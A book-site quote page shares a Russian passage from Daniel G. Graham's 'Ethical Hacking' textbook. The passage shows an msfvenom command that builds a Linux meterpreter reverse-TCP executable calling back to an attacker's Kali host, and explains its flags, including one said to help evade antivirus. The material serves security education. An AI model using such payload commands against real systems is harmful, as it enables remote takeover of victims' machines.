БастыАудиоБалаларға арналған
Анатолий М.
Анатолий М.дәйексөз келтірді5 күн бұрын
kali@kali:~/Desktop/Malware$ sudo msfvenom -a x86 --platform linux -p linux/ ➥ x86/meterpreter/reverse_tcp LHOST=<IP-адрес Kali> LPORT=443 ➥ --smallest -i 4 -f elf -o malicious Флаг -a обозначает целевую архитектуру, в данном случае это x86. Флаг --platform указывает целевую платформу, а флаг -p — тип полезной нагрузки, в данном случае это обратная TCP-оболочка, подобная той, которую мы реализовали в главе 4. Флаг --smallest генерирует минимально возможную полезную нагрузку. Флаг -i помогает обходить средства антивирусной защиты, о чем мы поговорим чуть позже. Флаг -f задает тип выходного файла. Мы выбрали формат elf, поскольку он используется исполняемыми файлами ОС Linux. (Формат exe используется исполняемыми файлами ОС Windows.) Флаг -o задает имя выходного файла.
Этичный хакинг. Практическое руководство по взлому
Этичный хакинг. Практическое руководство по взлому
·
Дэниел Г. Грэм
Этичный хакинг. Практическое руководство по взлому
Дэниел Г. Грэмжәне т.б.
6.7K

Кіру не тіркелу пікір қалдыру үшін